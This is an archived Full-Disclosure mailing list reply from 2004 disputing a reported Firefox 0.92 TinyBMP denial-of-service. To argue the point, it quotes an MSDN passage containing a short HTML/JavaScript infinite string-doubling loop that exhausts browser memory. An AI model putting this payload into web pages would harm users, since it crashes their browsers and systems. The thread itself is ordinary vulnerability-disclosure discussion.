[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: AW: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP

To: "Lee Packham" <lpackham@xxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: Re: AW: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP
From: "morning_wood" <se_cur_ity@xxxxxxxxxxx>
Date: Mon, 12 Jul 2004 18:13:43 -0700

it seems to just be loading a bunch of data ( 1851MB ) via images
to consume memory.

the same effect can be accomplished here...

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp

---------- snip ----------
Such memory protection systems aren't foolproof. Even for normal memory and
non-ActiveX controls, this script fragment will bring most browsers quickly
to their knees (don't try this unless you're willing to re-boot):

<HTML><BODY><SCRIPT>
var big_string = "double me up!";

while (true)
{
    big_string = big_string + big_string;   // 20 iterations equals all your
memory...
}
</SCRIPT></BODY></HTML>

---------- snip ----------

or not



m.wood

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- AW: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP
  - From: Webmaster
- Re: AW: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP
  - From: Lee Packham

Prev by Date: RE: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP
Next by Date: [Full-Disclosure] MySQL 4.1/5.0 zero-length password auth. bypass - modified MySQL client
Previous by thread: Re: AW: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP
Next by thread: Re: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP & Thunderbird 0.72 & Outlook Express (latest Version)
Index(es):
- Date
- Thread